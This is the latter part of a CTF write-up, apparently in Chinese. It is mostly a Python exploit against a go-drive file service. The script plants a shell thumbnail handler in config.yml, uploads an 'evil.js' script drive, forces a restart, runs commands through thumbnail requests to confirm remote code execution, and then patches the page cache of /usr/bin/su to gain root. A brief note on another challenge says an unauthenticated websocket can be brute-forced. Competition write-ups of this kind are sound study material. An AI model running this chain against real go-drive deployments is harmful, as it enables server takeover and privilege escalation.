        self.log("注入 shell thumbnail handler")
        cfg_path = f"{ROOTISH}/app/config.yml"
        cfg = self.get_content(cfg_path)
        if "type: shell\\n      tags: pwn" not in cfg:
            marker = "      #  padding: 10\\n"
            if marker not in cfg:
                raise RuntimeError("未找到配置插入点,config.yml 格式可能变了")
            cfg = cfg.replace(marker, marker + SHELL_HANDLER_BLOCK, 1)
            self.save_file(f"{ROOTISH}/app/config.yml.bak.exp", self.get_content(cfg_path))
            self.save_file(cfg_path, cfg)

        self.log("设置 handlersMapping")
        body, status = self.api(
            "/admin/options",
            method="PUT",
            data={"thumbnail.handlersMapping": THUMB_MAPPING},
        )
        if status != 200:
            raise RuntimeError(f"写 options 失败: HTTP {status} {body}")

    def ensure_boom(self):
        self.log("写入 evil script drive")
        self.save_file(f"{ROOTISH}/app/data/script-drives/evil.js", EVIL_SCRIPT)

        desired = {
            "name": BOOM,
            "enabled": True,
            "type": "script",
            "config": "{\\"script\\":\\"evil\\"}",
        }
        self.api("/admin/drive", method="POST", data=desired)
        self.api(f"/admin/drive/{BOOM}", method="PUT", data=desired)
        self.api(f"/admin/drive/{BOOM}/init-config", method="POST")
        self.api(f"/admin/drive/{BOOM}/init", method="POST", data="{}", ctype="application/json")
        self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
        self.get_entry(f"{BOOM}/x.txt")

    def trigger_restart(self):
        self.log("触发 boom thumbnail,强制 go-drive 重启")
        entry = self.get_entry(f"{BOOM}/x.txt")
        key = entry["meta"]["accessKey"]
        self.req("/thumbnail/" + f"{BOOM}/x.txt" + "?_k=" + urllib.parse.quote(key, safe=""), timeout=10)
        self.wait_service_back()

    def wait_service_back(self):
        self.log("等待 go-drive 恢复")
        for _ in range(15):
            try:
                self.auth()
                return
            except Exception:
                time.sleep(1)
        raise RuntimeError("go-drive 长时间未恢复")

    def shell_cmd(self, cmd):
        self.save_file(CMD_PATH, cmd.rstrip("\\n") + "\\n")
        entry = self.get_entry(CMD_PATH)
        key = entry["meta"]["accessKey"]
        body, status = self.req("/thumbnail/" + CMD_PATH + "?_k=" + urllib.parse.quote(key, safe=""), timeout=120)
        return body, status

    def verify_rce(self):
        self.log("验证 app 级 shell RCE")
        body, status = self.shell_cmd("whoami\\nid\\npwd")
        if status != 200 or "uid=" not in body:
            raise RuntimeError(f"RCE 验证失败: HTTP {status} {body}")
        self.log("RCE OK")

    def patch_su_pagecache(self):
        self.log("用 copy.fail 思路覆写 /usr/bin/su 页缓存")
        body, status = self.shell_cmd(COPY_FAIL_PATCH_CMD)
        if status != 200 or "PATCHED_SU" not in body:
            raise RuntimeError(f"copy.fail patch 失败: HTTP {status} {body}")

    def poll_flag(self, timeout=420, interval=5):
        self.log("轮询 /ancient/f,等待 root cron 落出 flag")
        deadline = time.time() + timeout
        urls = [
            self.root_base + "/ancient/f",
            self.root_base + "/data/f",
        ]
        while time.time() < deadline:
            for url in urls:
                try:
                    with urllib.request.urlopen(url, timeout=10) as resp:
                        body = resp.read().decode("utf-8", "ignore")
                        text = body.strip()
                        if "flag{" in text.lower() or "actf{" in text.lower():
                            return text
                        if text and "File Download Service" not in text and "<html" not in text.lower():
                            return text
                except Exception:
                    pass
            time.sleep(interval)
        raise RuntimeError("轮询超时,flag 还没出现")

def main():
    parser = argparse.ArgumentParser(description="Exploit Real DLsite and print the flag")
    parser.add_argument("--base", required=True, help="base URL, e.g. <http://host>:port or <http://host>:port/new")
    parser.add_argument("--user", default=DEFAULT_USER)
    parser.add_argument("--password", default=DEFAULT_PASSWORD)
    parser.add_argument("--timeout", type=int, default=420, help="flag polling timeout in seconds")
    args = parser.parse_args()

    api_base, root_base = normalize_base(args.base)
    exp = Exploit(api_base, root_base, args.user, args.password)

    exp.auth()
    exp.ensure_rootish()
    exp.ensure_shell_handler()
    exp.ensure_boom()
    exp.trigger_restart()
    exp.verify_rce()
    exp.patch_su_pagecache()
    flag = exp.poll_flag(timeout=args.timeout)
    print(flag)

if __name__ == "__main__":
    main()

master of album

websocket没鉴权,可以使用任意token去打,题目也是静态flag

因此机会无限多,只需要尽可能多的尝试一定能做出来

或者让AI写个脚本去爬题库

许可协议:  CC BY 4.0